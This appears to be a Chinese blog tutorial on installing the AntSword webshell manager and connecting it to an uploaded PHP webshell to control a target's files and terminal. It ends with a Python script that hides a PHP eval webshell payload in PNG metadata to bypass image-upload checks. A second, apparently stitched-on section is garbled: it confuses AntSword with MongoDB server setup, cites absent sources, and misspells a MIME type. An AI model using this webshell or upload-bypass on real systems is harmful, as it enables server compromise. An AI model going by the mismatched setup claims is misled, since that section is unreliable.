【webshell工具——蚁剑】蚁剑安装使用教程

前言

本篇内容主要为webshell工具蚁剑的安装以及使用,本人也通过查询较多的文章,进行了总结,由于是第一次接触,有些地方可能存在问题,欢迎评论区留言。

[步骤1] 蚁剑工具的下载

废话不多说直接放链接
加载(启动)器:
链接: https://github.com/AntSwordProject/AntSword-Loader
加速器选择合适的就行,由于我是下载到虚拟机(用的win10),所以下载的windows 64位的,其他的我暂时没有尝试。
在这里插入图片描述

核心源码:
链接: https://github.com/AntSwordProject/antSword
另外zip下载完成之后,zip下载路径后面还会用到。
在这里插入图片描述
下载完成之后,解压缩如下。

打开加载器(AntSword-Loader -v4.0.3-win32-x64),双击AnSword.exe
在这里插入图片描述

[步骤2] 加载器配置核心代码

点击初始化,选择核心代码所在的文件位置
在这里插入图片描述
配置后重新启动(也就是关闭后再次打开即可)
然后再次双击运行–>空白处鼠标右键–>添加数据–>URL为目标地址后面再加上/xxx.php (也就是要上传的小马),本例用的hack.php,密码在hack.php中给出。
在这里插入图片描述
点击测试连接,显示成功,则点击添加即可。
在这里插入图片描述
双击该数据即可进行终端管理和文件操作
在这里插入图片描述

在这里插入图片描述

### 关于使用方法 是一款功能强大的WebShell管理工具,支持多种编程语言环境下的反序列化和命令执行操作。以下是关于其基本原理以及如何配置和使用的详细介绍: #### 基本工作原理 的核心机制在于通过特定函数实现远程代码执行 (RCE),具体如下: - **PHP**: 利用了 `assert` 和 `eval` 函数来解析并运行恶意脚本[^2]。 - **ASP**: 仅依赖 `eval` 来完成动态代码注入与执行。 - **JSP**: 运用 Java 的类加载器 (`ClassLoader`) 动态编译和加载字节码文件,并通常伴随 Base64 编码解码过程以隐藏敏感逻辑。 这些特性使得能够适应不同服务器端技术栈的需求,在渗透测试场景中有广泛应用价值。 #### 安装部署流程 为了正常使用客户端及其服务端组件,请按照以下说明准备相应环境: 1. 下载官方发布的最新版本程序包; 2. 将压缩后的安装文件上传到目标主机指定路径下(例如 `/var/www/html/antSword_server/` 或其他 Web 访问可达位置)[^4]; 3. 创建必要的数据存储目录结构,比如用于保存 MongoDB 数据库记录的 `mongodbdata` 文件夹以及存放日志信息的日志目录 `logs` [^4]: ```bash mkdir -p /path/to/mongodbdata /path/to/logs ``` #### 配置连接参数 启动前需调整默认设置满足实际需求,主要涉及以下几个方面: - **监听地址与端口**:修改配置文件中的 bind_ip 和 port 字段定义对外提供服务的具体网络接口及端口号; - **认证方式**:启用密码保护模式防止未授权访问风险; - **持久化选项**:开启自动重连等功能提升稳定性表现。 完成后即可尝试初始化 session 并验证交互效果。 --- ### 实践案例分析 假设存在这样一个漏洞情景——某网站允许用户提交图片素材却缺乏严格校验机制,则可能被攻击者利用绕过检测规则从而植入木马文件。此时可以参照下面给出的例子进行模拟演练: 已知条件表明只接受三种 MIME 类型分别为 `image/jpeg`, `image/png`, `imgae/gif` 的资源上传请求[^3]。因此我们需要构造伪装成合法图像格式但实际上嵌入可被执行指令的内容体递交过去。 借助 Python 脚本快速生成符合上述要求的同时还暗藏 PHP payload 的样本供后续导入测试之用: ```python from PIL import Image, PngImagePlugin import io def create_malicious_image(payload=b"<?php @eval($_POST['cmd']); ?>"): img = Image.new('RGB', (100, 100)) buffer = io.BytesIO() meta_info = PngImagePlugin.PngInfo() # Add malicious code as comment field inside PNG metadata. meta_info.add_text("Comment", str(payload)) img.save(buffer, format="PNG", pnginfo=meta_info) return buffer.getvalue() if __name__ == "__main__": with open("./malicious.png", "wb") as f: f.write(create_malicious_image()) ``` 成功制作完毕之后再配合平台发起进一步探索活动直至达成预期成果为止! ---
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值